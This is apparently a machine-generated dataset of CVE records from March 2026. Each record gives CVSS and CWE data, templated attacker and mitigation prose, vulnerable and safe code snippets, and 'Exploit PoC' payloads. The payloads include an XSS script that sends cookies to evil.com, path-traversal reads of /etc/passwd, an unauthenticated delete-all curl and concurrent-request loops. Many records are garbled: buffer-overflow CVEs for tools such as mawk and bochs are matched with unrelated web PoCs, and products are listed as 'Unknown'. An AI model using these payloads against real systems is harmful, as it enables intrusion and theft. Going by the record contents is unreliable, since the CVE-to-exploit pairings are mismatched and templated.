The attacker monitors underground forums for variants and bypasses. The attacker leverages path normalization bypass with ....// or ..%2f. The attacker seeks total control of the host or container. The target is Unknown versions Unknown.
Resolve the canonical path and verify it resides under the allowed root. Conduct security-focused code reviews for all new code. Establish a secure communication channel for incident reporting. Integrate security checks into the pull-request review workflow. The fix must be validated specifically for Unknown versions U...
# Example: Path traversal in download (Unknown) # VULNERABLE: path concatenated without validation filename = request.args.get('file') path = f"/var/www/files/{{filename}}" return send_file(path) # file = ../../../etc/passwd escapes the intended directory. # SAFE: resolve and verify prefix containment from pathlib imp...
# Exploit PoC: Double-encoded path traversal (Unknown) # Payload: %252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd # Request: GET /download?file=%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1 # Expected: URL decode → %2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd → second decode by application...
CVE-2016-20049
2026-03-28T12:16:01.407
9.8
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE-787
jad_java_decompiler
1.5.8e-1kali1
The vulnerability arises from an interplay of multiple components. Confirmed in jad_java_decompiler with builds 1.5.8e-1kali1. The flaw was identified through patch analysis or anomalous behavior. The NVD entry notes: JAD 1.5.8e-1kali1 and prior contains a stack-based buffer overflow vulnerability that allows attackers...
Review of the vendor advisory is required for precise root cause details. Impact: affects organizational reputation and regulatory compliance. The precondition is running jad_java_decompiler with default configuration. CVSS 9.8 (critical). Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H.
The attacker reviews public advisories to identify the precise vulnerable code path. The attacker monitors Exploit-DB and GitHub for published PoCs. The goal is to gain unauthorized access to critical resources. The typical environment involves jad_java_decompiler up to 1.5.8e-1kali1.
Consider isolating the component until a definitive fix is applied. Use container image scanning to detect vulnerable components in builds. Test the fix in a staging environment that mirrors production. Include the flaw in tabletop exercises and incident simulations. The fix must be validated specifically for jad_java_...
// Example: Missing rate limiting in jad_java_decompiler (1.5.8e-1kali1) // VULNERABLE: no limit on request frequency @app.route('/api/login', methods=['POST']) def login(): user = authenticate(request.json) if user: return token(user) return 'Invalid', 401 // Attackers can brute-force credentials at full n...
// Exploit PoC: Race condition exploitation (jad_java_decompiler) // Payload: Send multiple concurrent requests to trigger TOCTOU (time-of-check time-of-use) // Request: parallel curl requests: for i in {{1..100}}; do curl https://target.com/api/transfer & done // Expected: Two requests pass the check before either upd...
CVE-2017-20225
2026-03-28T12:16:01.613
9.8
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE-787
tiemu
*
There is a confirmed vulnerability reported by the vendor or community. Confirmed in tiemu with builds *. The vulnerability arises from an interplay of multiple components. The published analysis states: TiEmu 2.08 and prior contains a stack-based buffer overflow vulnerability that allows attackers to execute arbitrary...
The defect was cataloged from observed behavior or a patch diff. Impact: scale depends on service exposure to the Internet or intranet. Effective mitigation requires upgrading to an unaffected version. CVSS 9.8 (critical). Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H.
The attacker fuzzes parameters with known payloads to confirm the flaw. The attacker analyzes the patch diff to understand the exact vector. The attacker intends to establish a foothold for a longer-term campaign. The target is tiemu versions *.
Consult vendor advisories for specific mitigation details. Maintain an up-to-date inventory of all components and dependencies. Deploy runtime application self-protection (RASP) as an additional layer. Enable detailed logging to detect bypass attempts. The fix must be validated specifically for tiemu versions *. Given ...
# Example: Unsafe deserialization in tiemu (*) # VULNERABLE: parsing attacker-controlled serialized data obj = parse_binary_format(request.data) # Malformed or oversized input causes crashes or memory corruption. # SAFE: validate structure before and during parsing header = parse_header(request.data[:HEADER_SIZE]) if ...
# Exploit PoC: Logic flaw in business process (tiemu) # Payload: Manipulate workflow state transitions (skip payment step, bypass approval) # Request: POST /api/checkout HTTP/1.1 | body={"step":"confirm","payment_status":"paid","amount":0} # Expected: Server trusts client-supplied state; order confirmed without payment...
CVE-2017-20226
2026-03-28T12:16:01.810
8.4
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE-787
Unknown
Unknown
Exposure depends on deployment, configuration, and affected version. Confirmed in Unknown with builds Unknown. This is a security flaw cataloged in the NVD. The vendor advisory describes: Mapscrn 2.0.3 contains a stack-based buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplyin...
The impact depends on the network context, permissions, and data present. Impact: varies by specific vector and deployment environment. The vulnerable component is Unknown (builds Unknown). CVSS 8.4 (high). Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H.
The attacker analyzes frontend JavaScript bundles to discover endpoints. The attacker reproduces the behavior in an isolated environment. The attacker aims to exfiltrate sensitive information. The typical environment involves Unknown up to Unknown.
Monitor IOCs and logs for exploitation attempts. Revoke any potentially compromised credentials. Notify affected users about the upgrade requirement. Implement SAST and DAST in the build and deployment pipeline. The fix must be validated specifically for Unknown versions Unknown. Given the high severity, apply the patc...
# Example: Generic security flaw in Unknown (Unknown) # VULNERABLE: unsanitized user input in processing user_input = request.args.get('input') result = process(user_input) # The code trusts external data without validation. # SAFE: validate, sanitize, and constrain input user_input = request.args.get('input') if not ...
# Exploit PoC: Logic flaw in business process (Unknown) # Payload: Manipulate workflow state transitions (skip payment step, bypass approval) # Request: POST /api/checkout HTTP/1.1 | body={"step":"confirm","payment_status":"paid","amount":0} # Expected: Server trusts client-supplied state; order confirmed without payme...
CVE-2017-20227
2026-03-28T12:16:01.993
9.8
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE-787
jad_java_decompiler
1.5.8e-1kali1
This defect affects confidentiality, integrity, or availability. The affected application is jad_java_decompiler versions 1.5.8e-1kali1. Exposure depends on deployment, configuration, and affected version. The official description indicates: JAD Java Decompiler 1.5.8e-1kali1 and prior contains a stack-based buffer over...
Review of the vendor advisory is required for precise root cause details. Impact: the patch diff and advisories provide precise scope. Exploitation requires valid low-privilege credentials. CVSS 9.8 (critical). Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H.
The attacker enumerates jad_java_decompiler versions via banners or headers. The attacker uses the Metasploit framework to automate the exploit. The goal is to compromise the confidentiality of protected data. The PoC works against default installations of jad_java_decompiler 1.5.8e-1kali1.
Conduct threat modeling to identify trust boundaries. Use container image scanning to detect vulnerable components in builds. Configure automated alerts for new instances of the component. Ensure the patch is verified in an isolated environment before rollout. The fix must be validated specifically for jad_java_decompi...
// Example: Missing rate limiting in jad_java_decompiler (1.5.8e-1kali1) // VULNERABLE: no limit on request frequency @app.route('/api/login', methods=['POST']) def login(): user = authenticate(request.json) if user: return token(user) return 'Invalid', 401 // Attackers can brute-force credentials at full n...
// Exploit PoC: Generic input validation bypass (jad_java_decompiler) // Payload: Craft input outside expected range (type, size, format, encoding) // Request: Varies by vulnerability; fuzz all input vectors with AFL++ or libFuzzer // Expected: Application enters unexpected state; crash, information leak, or logic bypa...
CVE-2017-20228
2026-03-28T12:16:02.200
8.4
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE-787
flat_assembler
*
The system exhibits unsafe behavior under specific conditions. Published advisory affects flat_assembler up to version *. A security advisory has been published detailing the impact scope. Per the NVD: Flat Assembler 1.71.21 contains a stack-based buffer overflow vulnerability that allows local attackers to execute arb...
Isolated reproduction in Docker or VM is recommended for analysis. Impact: requires PoC analysis for exact determination. Attack complexity is low: a public or trivial exploit exists. CVSS 8.4 (high). Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H.
The attacker enumerates flat_assembler versions via banners or headers. The attacker researches the vulnerability and develops a working proof of concept. The attacker intends to establish a foothold for a longer-term campaign. The attack surface is present in flat_assembler deployments at version *.
Conduct threat modeling to identify trust boundaries. Deploy runtime application self-protection (RASP) as an additional layer. Establish a secure communication channel for incident reporting. Conduct security-focused code reviews for all new code. The fix must be validated specifically for flat_assembler versions *. G...
# Example: Generic security flaw in flat_assembler (*) # VULNERABLE: unsanitized user input in processing user_input = request.args.get('input') result = process(user_input) # The code trusts external data without validation. # SAFE: validate, sanitize, and constrain input user_input = request.args.get('input') if not...
# Exploit PoC: Memory exhaustion via unbounded allocation (flat_assembler) # Payload: Request with size=0x7FFFFFFF → server attempts to allocate 2GB # Request: POST /api/upload HTTP/1.1 | Content-Length: 2147483647 → server pre-allocates 2GB # Expected: Memory allocation fails or exhausts system memory; OOM killer term...
CVE-2017-20229
2026-03-28T12:16:02.400
9.8
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE-787
mawk
*
This CVE documents an uncategorized security vulnerability. The mawk component at versions * exhibits this defect. The flaw was identified through patch analysis or anomalous behavior. Advisory analysis reveals: MAWK 1.3.3-17 and prior contains a stack-based buffer overflow vulnerability that allows attackers to execut...
The root cause depends on the specific vendor advisory analysis. Impact: potential compromise of confidentiality, integrity, or availability. The vendor published an advisory with CVSS and a detailed vector. CVSS 9.8 (critical). Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H.
The attacker monitors underground forums for variants and bypasses. The attacker combines OSINT to find exposed targets. The objective is to degrade the target's reputation or operations. Affected versions: mawk *.
Consult vendor advisories for specific mitigation details. Enable detailed logging to detect bypass attempts. Review access logs for signs of exploitation prior to the fix. Implement SAST and DAST in the build and deployment pipeline. The fix must be validated specifically for mawk versions *. Given the high severity, ...
# Example: Insecure default configuration in mawk (*) # VULNERABLE: debug mode and auth disabled by default DEBUG = True REQUIRE_AUTH = False # Debug mode and disabled authentication expose information and access. # SAFE: environment-driven secure defaults DEBUG = os.getenv('ENV', 'production') == 'development' REQUIR...
# Exploit PoC: Logic flaw in business process (mawk) # Payload: Manipulate workflow state transitions (skip payment step, bypass approval) # Request: POST /api/checkout HTTP/1.1 | body={"step":"confirm","payment_status":"paid","amount":0} # Expected: Server trusts client-supplied state; order confirmed without payment;...
CVE-2018-25220
2026-03-28T12:16:02.600
9.8
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE-787
bochs
2.6.5
There is a confirmed vulnerability reported by the vendor or community. Published advisory affects bochs up to version 2.6.5. The system exhibits unsafe behavior under specific conditions. The NVD entry notes: Bochs 2.6-5 contains a stack-based buffer overflow vulnerability that allows attackers to execute arbitrary co...
The vulnerability involves interaction between multiple components. Impact: can be combined with other flaws for an exploit chain. The damage scale depends on the affected process's privileges. CVSS 9.8 (critical). Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H.
The attacker analyzes frontend JavaScript bundles to discover endpoints. The attacker validates the exploit in a lab before a real attack. The attacker aims to obtain credentials for future access. The attack is validated on bochs with builds 2.6.5.
Prioritize fixes based on Internet exposure and CVSS score. Maintain a log of all post-patch exceptions and errors. Test the fix in a staging environment that mirrors production. Enable file-integrity monitoring for critical system files. The fix must be validated specifically for bochs versions 2.6.5. Given the high s...
# Example: Insecure default configuration in bochs (2.6.5) # VULNERABLE: debug mode and auth disabled by default DEBUG = True REQUIRE_AUTH = False # Debug mode and disabled authentication expose information and access. # SAFE: environment-driven secure defaults DEBUG = os.getenv('ENV', 'production') == 'development' R...
# Exploit PoC: Race condition exploitation (bochs) # Payload: Send multiple concurrent requests to trigger TOCTOU (time-of-check time-of-use) # Request: parallel curl requests: for i in {{1..100}}; do curl https://target.com/api/transfer & done # Expected: Two requests pass the check before either updates state; double...
CVE-2018-25221
2026-03-28T12:16:02.793
9.8
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE-787
easy_chat_server
*
The exact vector requires reviewing advisories and patch diffs. The affected software is easy_chat_server with versions *. The flaw was identified through patch analysis or anomalous behavior. The vendor advisory describes: EChat Server 3.1 contains a buffer overflow vulnerability in the chat.ghp endpoint that allows r...
The root cause depends on the specific vendor advisory analysis. Impact: may lead to partial or full system compromise under certain conditions. The vendor published an advisory with CVSS and a detailed vector. CVSS 9.8 (critical). Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H.
The attacker identifies the vulnerable endpoint or functionality via reconnaissance. The attacker targets systems running the vulnerable software version identified in the advisory. The attacker seeks total control of the host or container. The target runs unpatched easy_chat_server (versions *).
Consider isolating the component until a definitive fix is applied. Update dependencies and frameworks to non-vulnerable versions. Establish a secure communication channel for incident reporting. Consider hiring a red team to validate fix effectiveness. The fix must be validated specifically for easy_chat_server versio...
# Example: Unsafe deserialization in easy_chat_server (*) # VULNERABLE: parsing attacker-controlled serialized data obj = parse_binary_format(request.data) # Malformed or oversized input causes crashes or memory corruption. # SAFE: validate structure before and during parsing header = parse_header(request.data[:HEADER...
# Exploit PoC: Generic input validation bypass (easy_chat_server) # Payload: Craft input outside expected range (type, size, format, encoding) # Request: Varies by vulnerability; fuzz all input vectors with AFL++ or libFuzzer # Expected: Application enters unexpected state; crash, information leak, or logic bypass depe...
CVE-2018-25222
2026-03-28T12:16:02.983
8.4
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE-787
Unknown
Unknown
This is a security flaw cataloged in the NVD. Versions Unknown of Unknown contain this flaw. This defect affects confidentiality, integrity, or availability. The vendor advisory describes: SC v7.16 contains a stack-based buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying ov...
Isolated reproduction in Docker or VM is recommended for analysis. Impact: potential compromise of confidentiality, integrity, or availability. The vector requires local access or physical interaction. CVSS 8.4 (high). Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H.
The attacker reviews public advisories to identify the precise vulnerable code path. The attacker consults CVE details and the NVD to confirm exploitability. The attacker seeks total control of the host or container. The flaw is exploitable in deployments of Unknown (Unknown).
Monitor IOCs and logs for exploitation attempts. Monitor underground forums and Exploit-DB for new variants. Monitor performance metrics after applying the patch. Conduct a post-mortem to identify process gaps that allowed the flaw. The fix must be validated specifically for Unknown versions Unknown. Given the high sev...
# Example: Insecure default configuration in Unknown (Unknown) # VULNERABLE: debug mode and auth disabled by default DEBUG = True REQUIRE_AUTH = False # Debug mode and disabled authentication expose information and access. # SAFE: environment-driven secure defaults DEBUG = os.getenv('ENV', 'production') == 'developmen...
# Exploit PoC: Logic flaw in business process (Unknown) # Payload: Manipulate workflow state transitions (skip payment step, bypass approval) # Request: POST /api/checkout HTTP/1.1 | body={"step":"confirm","payment_status":"paid","amount":0} # Expected: Server trusts client-supplied state; order confirmed without payme...
CVE-2018-25223
2026-03-28T12:16:03.170
9.8
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE-787
crashmail_ii
*
The system exhibits unsafe behavior under specific conditions. Published advisory affects crashmail_ii up to version *. This is a security flaw cataloged in the NVD. Impact documentation: Crashmail 1.6 contains a stack-based buffer overflow vulnerability that allows remote attackers to execute arbitrary code by sending...
The vulnerability stems from a combination of design and implementation issues. Impact: the vendor has assigned a CVSS score reflecting the severity. The impact varies with the configuration of crashmail_ii. CVSS 9.8 (critical). Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H.
The attacker analyzes frontend JavaScript bundles to discover endpoints. The attacker performs fingerprint recon via banners and headers. The attacker intends to establish a foothold for a longer-term campaign. The vendor confirmed that crashmail_ii * contains the defect.
Apply defense-in-depth measures while the permanent fix is being tested. Train the development team on this vulnerability category. Assess the fix's impact on upstream and downstream dependencies. Use threat-intelligence feeds to anticipate zero-day exploits. The fix must be validated specifically for crashmail_ii vers...
# Example: Missing rate limiting in crashmail_ii (*) # VULNERABLE: no limit on request frequency @app.route('/api/login', methods=['POST']) def login(): user = authenticate(request.json) if user: return token(user) return 'Invalid', 401 # Attackers can brute-force credentials at full network speed. # SAFE:...
# Exploit PoC: Logic flaw in business process (crashmail_ii) # Payload: Manipulate workflow state transitions (skip payment step, bypass approval) # Request: POST /api/checkout HTTP/1.1 | body={"step":"confirm","payment_status":"paid","amount":0} # Expected: Server trusts client-supplied state; order confirmed without ...
CVE-2018-25224
2026-03-28T12:16:03.370
8.4
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE-306
practical_music_search
*
This is a Missing Authentication vulnerability. Versions * of practical_music_search contain this flaw. There is an anonymous-access flaw to destructive operations. The official disclosure details: PMS 0.42 contains a stack-based buffer overflow vulnerability that allows local unauthenticated attackers to execute arbit...
The frontend hides buttons but the REST API does not repeat checks. Impact: modification of security policies and access lists. The attack surface includes the default service port of practical_music_search. CVSS 8.4 (high). Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H.
The attacker reviews public advisories to identify the precise vulnerable code path. The attacker directly calls an unauthenticated administrative API endpoint. The attacker aims to obtain credentials for future access. The vendor confirmed that practical_music_search * contains the defect.
Use a service mesh (Istio, Linkerd) for authZ across all communication. Establish patching SLAs based on CVE severity. Assess the fix's impact on upstream and downstream dependencies. Configure incremental backups and test restore before patching. The fix must be validated specifically for practical_music_search versio...
# Example: Admin panel without login (practical_music_search) # VULNERABLE: admin routes missing auth middleware app.get('/admin/dashboard', (req, res) => {{ res.render('admin', {{ stats: getStats() }}); }}); # Anyone who discovers the URL can access the admin dashboard. # SAFE: apply auth middleware to all admin ...
# Exploit PoC: Swagger UI without authentication (practical_music_search) # Payload: Visit /swagger-ui.html → list all endpoints → POST /api/admin/delete-all # Request: curl -X POST https://target.com/api/admin/delete-all # Expected: Swagger documents all API endpoints including admin; unauthenticated execution deletes...
CVE-2018-25225
2026-03-28T12:16:03.560
8.4
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE-306
sipp
3.3
The frontend hides buttons but the API does not repeat security checks. The sipp component at versions 3.3 exhibits this defect. An internal API port is reachable without any access control. The NVD entry notes: SIPP 3.3 contains a stack-based buffer overflow vulnerability that allows local unauthenticated attackers to...
An administrative interface is deployed without any access control. Impact: exposure of all application secrets through debug endpoints. Attack complexity is high: race conditions or multi-step chains. CVSS 8.4 (high). Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H.
The attacker probes for the specific vulnerable sipp version using fingerprinting. The attacker directly calls an unauthenticated administrative API endpoint. The objective is to degrade the target's reputation or operations. The vulnerable instance runs sipp without the security patch.
Use an API Gateway with mTLS or service tokens for internal traffic. Conduct a post-mortem to identify process gaps that allowed the flaw. Apply the principle of least privilege to all service accounts. Maintain an up-to-date inventory of all components and dependencies. The fix must be validated specifically for sipp ...
# Example: WebSocket without authentication (sipp) # VULNERABLE: WebSocket upgrade without verifying identity const wss = new WebSocketServer({{ port: 8080 }}); wss.on('connection', (ws) => {{ ws.on('message', (msg) => broadcast(msg)); }}); # Anyone can connect and broadcast messages to all users. # SAFE: authenti...
# Exploit PoC: Swagger UI without authentication (sipp) # Payload: Visit /swagger-ui.html → list all endpoints → POST /api/admin/delete-all # Request: curl -X POST https://target.com/api/admin/delete-all # Expected: Swagger documents all API endpoints including admin; unauthenticated execution deletes all data. # Detec...
CVE-2026-2595
2026-03-28T12:16:03.850
5.4
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
CWE-79
Unknown
Unknown
The application trusts external data when constructing the document object model. Versions Unknown of Unknown contain this flaw. The software fails to sanitize user input before rendering it in the DOM. Per the NVD: The Quads Ads Manager for Google AdSense plugin for WordPress is vulnerable to Stored Cross-Site Scripti...
The flaw lies in interpolating user data into templates without escaping. Impact: deployment of persistent keyloggers and web beacons. The vector requires local access or physical interaction. CVSS 5.4 (medium). Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N.
The attacker analyzes source code or firmware to find the entry point. The attacker uses SVG onload or images with events for silent execution. The attacker seeks privilege escalation or remote execution. The vulnerable instance runs Unknown without the security patch.
Use DOMPurify for raw HTML sanitization. Deploy runtime application self-protection (RASP) as an additional layer. Document the flaw and fix in the team's knowledge base. Integrate security checks into the pull-request review workflow. The fix must be validated specifically for Unknown versions Unknown. Schedule the pa...
# Example: DOM XSS via innerHTML (Unknown) # VULNERABLE: inserts raw content into the DOM const hash = location.hash.slice(1); document.getElementById('output').innerHTML = hash; # Hash can contain <img src=x onerror=fetch('/steal?cookie='+document.cookie)>. # SAFE: use textContent for safe insertion const hash = loca...
# Exploit PoC: Reflected XSS cookie theft (Unknown) # Payload: <script>fetch('https://evil.com/steal?c='+document.cookie)</script> # Request: GET /search?q=<script>fetch('https://evil.com/steal?c='+document.cookie)</script> HTTP/1.1 # Expected: Victim browser sends session cookie to attacker-controlled server. # Detect...
CVE-2026-4996
2026-03-28T12:16:04.150
7.3
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
CWE-74
Unknown
Unknown
The vulnerability arises from an interplay of multiple components. In Unknown up to Unknown, the flaw is present. This is a security flaw cataloged in the NVD. The published analysis states: A vulnerability was identified in Sinaptik AI PandasAI up to 0.1.4. Affected by this issue is the function delete_question_and_an...
Preconditions and the exact vector vary by deployment and configuration. Impact: affects organizational reputation and regulatory compliance. The flaw affects Unknown versions Unknown. CVSS 7.3 (high). Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L.
The attacker analyzes frontend JavaScript bundles to discover endpoints. The attacker uses the Metasploit framework to automate the exploit. The attacker seeks total control of the host or container. Affected versions: Unknown Unknown.
Consult vendor advisories for specific mitigation details. Use container image scanning to detect vulnerable components in builds. Enable file-integrity monitoring for critical system files. Ensure the patch is verified in an isolated environment before rollout. The fix must be validated specifically for Unknown versio...
# Example: Generic security flaw in Unknown (Unknown) # VULNERABLE: unsanitized user input in processing user_input = request.args.get('input') result = process(user_input) # The code trusts external data without validation. # SAFE: validate, sanitize, and constrain input user_input = request.args.get('input') if not ...
# Exploit PoC: Logic flaw in business process (Unknown) # Payload: Manipulate workflow state transitions (skip payment step, bypass approval) # Request: POST /api/checkout HTTP/1.1 | body={"step":"confirm","payment_status":"paid","amount":0} # Expected: Server trusts client-supplied state; order confirmed without payme...
CVE-2026-4997
2026-03-28T13:16:34.803
5.3
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
CWE-22
Unknown
Unknown
User-supplied filenames are concatenated directly with the base directory. The Unknown component at versions Unknown exhibits this defect. There is an arbitrary filesystem navigation flaw. Impact documentation: A security flaw has been discovered in Sinaptik AI PandasAI up to 3.0.0. This affects the function is_sql_que...
The root cause is direct filename concatenation with the base directory. Impact: template or log overwrite for XSS or code execution. The flaw affects Unknown versions Unknown. CVSS 5.3 (medium). Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N.
The attacker uses Nuclei or Nessus to identify targets at scale. The attacker uses double encoding (%252f) to bypass naive filters. The objective is to degrade the target's reputation or operations. Affected versions: Unknown Unknown.
Store uploads outside the web root and serve via proxy. Document the flaw and fix in the team's knowledge base. Conduct a post-mortem to identify process gaps that allowed the flaw. Apply the principle of least privilege to all service accounts. The fix must be validated specifically for Unknown versions Unknown. Sched...
# Example: Zip Slip (Unknown) # VULNERABLE: extracts with original zip entry name with zipfile.ZipFile(upload) as zf: zf.extractall("/var/www/uploads/") # Entry name ../../webshell.php extracts outside the intended directory. # SAFE: validate each member before extraction with zipfile.ZipFile(upload) as zf: fo...
# Exploit PoC: Path traversal reading /etc/passwd (Unknown) # Payload: ../../../../../../etc/passwd # Request: GET /download?file=../../../../../../etc/passwd HTTP/1.1 # Expected: Server returns contents of /etc/passwd; user enumeration enables targeted brute-force attacks. # Detection: ../ sequences in file parameters...
CVE-2026-4998
2026-03-28T14:15:58.987
7.3
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
CWE-74
Unknown
Unknown
The flaw was identified through patch analysis or anomalous behavior. Observed in Unknown (up to Unknown). The exact vector requires reviewing advisories and patch diffs. CVE details: A weakness has been identified in Sinaptik AI PandasAI up to 3.0.0. This vulnerability affects the function CodeExecutor.execute of the ...
The vulnerability involves interaction between multiple components. Impact: the patch diff and advisories provide precise scope. The vulnerable component is Unknown (builds Unknown). CVSS 7.3 (high). Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L.
The attacker uses social engineering to gain access to staging or demo environments. The attacker monitors Exploit-DB and GitHub for published PoCs. The goal is to gain unauthorized access to critical resources. The test environment replicates Unknown at version Unknown.
Conduct threat modeling to identify trust boundaries. Revoke any potentially compromised credentials. Assess the fix's impact on upstream and downstream dependencies. Monitor underground forums and Exploit-DB for new variants. The fix must be validated specifically for Unknown versions Unknown. Given the high severity,...
# Example: Unsafe deserialization in Unknown (Unknown) # VULNERABLE: parsing attacker-controlled serialized data obj = parse_binary_format(request.data) # Malformed or oversized input causes crashes or memory corruption. # SAFE: validate structure before and during parsing header = parse_header(request.data[:HEADER_SI...
# Exploit PoC: Race condition exploitation (Unknown) # Payload: Send multiple concurrent requests to trigger TOCTOU (time-of-check time-of-use) # Request: parallel curl requests: for i in {{1..100}}; do curl https://target.com/api/transfer & done # Expected: Two requests pass the check before either updates state; doub...
CVE-2026-4999
2026-03-28T15:16:38.330
6.3
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
CWE-22
Unknown
Unknown
The system serves files based on user-controlled paths. Affects specifically Unknown at releases Unknown. An attacker can access files outside the intended directory via dot-dot-slash. The official description indicates: A security vulnerability has been detected in z-9527 admin up to 72aaf2dd05cf4ec2e98f390668b41e128e...
The application opens files before verifying they reside under the allowed root. Impact: reading /etc/passwd, SSH keys, and server source code. The flaw has been fixed in builds later than Unknown. CVSS 6.3 (medium). Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L.
The attacker probes for the specific vulnerable Unknown version using fingerprinting. The attacker sends filename=../../../etc/passwd for file download. The objective is data theft, persistence, or lateral pivoting. The flaw persists in Unknown up to version Unknown.
Reject paths that do not start with the permitted base directory. Maintain a log of all post-patch exceptions and errors. Perform regression fuzzing to ensure the fix did not introduce new crashes. Monitor performance metrics after applying the patch. The fix must be validated specifically for Unknown versions Unknown....
# Example: PHP include with user input (Unknown) # VULNERABLE: includes file based on GET parameter $page = $_GET['page']; include("/var/www/templates/" . $page . ".php"); # page = ../../../../etc/passwd%00 bypasses extension and reads system files. # SAFE: whitelist of allowed pages $allowed = ['home', 'about', 'cont...
# Exploit PoC: Path traversal reading /etc/passwd (Unknown) # Payload: ../../../../../../etc/passwd # Request: GET /download?file=../../../../../../etc/passwd HTTP/1.1 # Expected: Server returns contents of /etc/passwd; user enumeration enables targeted brute-force attacks. # Detection: ../ sequences in file parameters...
CVE-2026-5000
2026-03-28T15:16:38.563
7.3
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
CWE-287
Unknown
Unknown
Session tokens or claims can be forged or reused. Versions Unknown of Unknown contain this flaw. Improper authentication: broken login mechanisms. The security report mentions: A vulnerability was detected in PromtEngineer localGPT up to 4d41c7d1713b16b216d8e062e51a5dd88b20b054. Impacted is the function LocalGPTHandler...
Password reset links are predictable or do not expire after use. Impact: account takeover of any user without the password. The precondition is running Unknown with default configuration. CVSS 7.3 (high). Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L.
The attacker fuzzes parameters with known payloads to confirm the flaw. The attacker forces TLS downgrade to intercept credentials. The goal is to compromise the confidentiality of protected data. The target runs unpatched Unknown (versions Unknown).
Generate all authentication tokens using a cryptographically secure random source. Monitor performance metrics after applying the patch. Use threat-intelligence feeds to anticipate zero-day exploits. Run automated regression tests against the patched component. The fix must be validated specifically for Unknown version...
# Example: Timing attack on password comparison (Unknown) # VULNERABLE: early-exit string comparison def check_password(input_hash, stored_hash): for i in range(len(stored_hash)): if input_hash[i] != stored_hash[i]: return False return True # The loop exits early on a mismatch, leaking the c...
# Exploit PoC: Timing-based password enumeration (Unknown) # Payload: Measure response time for valid_user:correct_first_char vs valid_user:wrong_first_char # Request: for c in {{a..z}}; do time curl -X POST https://target.com/login -d "user=admin&password=$c..." | grep "response_time"; done # Expected: Correct charact...
CVE-2026-5001
2026-03-28T16:15:58.260
7.3
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
CWE-284
Unknown
Unknown
The exact vector requires reviewing advisories and patch diffs. Affects specifically Unknown at releases Unknown. The system exhibits unsafe behavior under specific conditions. The technical description states: A flaw has been found in PromtEngineer localGPT up to 4d41c7d1713b16b216d8e062e51a5dd88b20b054. The affected ...
The defect was cataloged from observed behavior or a patch diff. Impact: requires PoC analysis for exact determination. Attack complexity is low: a public or trivial exploit exists. CVSS 7.3 (high). Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L.
The attacker analyzes source code or firmware to find the entry point. The attacker researches the vulnerability and develops a working proof of concept. The attacker seeks privilege escalation or remote execution. Affected versions: Unknown Unknown.
Consult vendor advisories for specific mitigation details. Apply the principle of least privilege to all service accounts. Ensure the patch is verified in an isolated environment before rollout. Revoke any potentially compromised credentials. The fix must be validated specifically for Unknown versions Unknown. Given th...
# Example: Race condition in Unknown (Unknown) # VULNERABLE: check-then-act without synchronization if balance >= amount: balance -= amount transfer(amount) # Two concurrent requests can both pass the check and double-spend. # SAFE: atomic operation with locking with lock: if balance >= amount: bal...
